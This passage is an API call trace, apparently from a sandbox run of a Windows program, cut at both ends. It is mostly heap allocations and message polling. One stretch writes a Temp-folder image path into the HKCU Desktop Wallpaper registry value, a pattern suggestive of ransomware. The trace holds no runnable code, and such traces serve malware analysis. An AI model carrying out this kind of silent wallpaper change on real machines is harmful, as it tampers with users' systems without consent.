SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0245.776] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0245.776] Sleep (dwMilliseconds=0xa) [0245.823] timeGetTime () returned 0x117d5a4 [0245.823] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0245.823] Sleep (dwMilliseconds=0xa) [0245.870] timeGetTime () returned 0x117d5d2 [0245.870] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0245.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0245.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0245.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0245.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0245.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0245.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0245.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0245.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0245.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0245.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0245.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0245.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0245.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0245.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0245.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0245.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0245.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0245.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0245.871] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0245.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0245.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0245.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab620 [0245.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0245.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab4b8 [0245.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0245.872] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf438 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0245.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0245.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x50) returned 0x29eb0b0 [0245.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0245.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0245.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0245.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0245.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0245.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0245.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0245.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0245.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0245.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0245.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0245.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0245.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0245.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0245.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xb0) returned 0x29f7878 [0245.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eb0b0 | out: hHeap=0x2af0000) returned 1 [0245.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0245.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0245.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0245.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0245.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0245.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0245.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0245.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0245.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0245.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0245.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0245.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0245.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0245.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2a73488 [0245.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0245.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0245.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0245.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0245.873] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0245.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0245.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0245.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0245.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0245.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0245.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0245.873] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8cf850, lpdwDisposition=0x8cf86c | out: phkResult=0x8cf850*=0x4e0, lpdwDisposition=0x8cf86c*=0x2) returned 0x0 [0245.873] RegSetValueExW (in: hKey=0x4e0, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg", cbData=0x54 | out: lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0245.874] RegCloseKey (hKey=0x4e0) returned 0x0 [0245.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73488 | out: hHeap=0x2af0000) returned 1 [0245.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0245.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0245.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0245.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0245.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0245.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0245.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0245.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0245.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0245.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0245.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0245.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0245.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0245.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0245.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0245.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0245.874] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0245.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0245.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0245.874] CharUpperBuffW (in: lpsz="A0F00F04C39", cchLength=0xb | out: lpsz="A0F00F04C39") returned 0xb [0245.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0245.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0245.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0245.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72338 [0245.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0245.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0245.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0245.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0245.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72218 [0245.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0245.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0245.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0245.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0245.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0245.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0245.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0245.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0245.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0245.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0245.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0245.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab650 [0245.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0245.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0245.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0245.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0245.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0245.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0245.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0245.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0245.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0245.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0245.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0245.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0245.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0245.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab6f8 [0245.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab4d0 [0245.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0245.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0245.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0245.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0245.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0245.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0245.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0245.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0245.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0245.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0245.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0245.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0245.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab668 [0245.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab6f8 [0245.876] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0245.876] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0245.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0245.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0245.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0245.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0245.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0245.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0245.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab668 | out: hHeap=0x2af0000) returned 1 [0245.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0245.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0245.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0245.877] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0245.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0245.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0245.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0245.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0245.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0245.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0245.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0245.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0245.877] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0245.877] CharUpperBuffW (in: lpsz="SSA0F00F04C39", cchLength=0xd | out: lpsz="SSA0F00F04C39") returned 0xd [0245.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0245.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0245.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0245.877] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0245.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0245.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0245.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0245.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0245.878] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0245.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0245.878] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0245.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0245.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0245.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0245.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0245.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0245.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0245.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0245.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0245.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0245.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0245.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4d0 | out: hHeap=0x2af0000) returned 1 [0245.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0245.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0245.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0245.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0245.878] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0245.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0245.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0245.878] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0245.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0245.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0245.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0245.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0245.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0245.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0245.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0245.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0245.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0245.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0245.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0245.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0245.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0245.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0245.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0245.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0245.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0245.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0245.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0245.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4d0 [0245.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0245.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab740 [0245.879] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0245.879] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab848 [0245.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0245.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0245.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab920 [0245.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0245.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9c8 [0245.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0245.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0245.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0245.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0245.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0245.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0245.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, 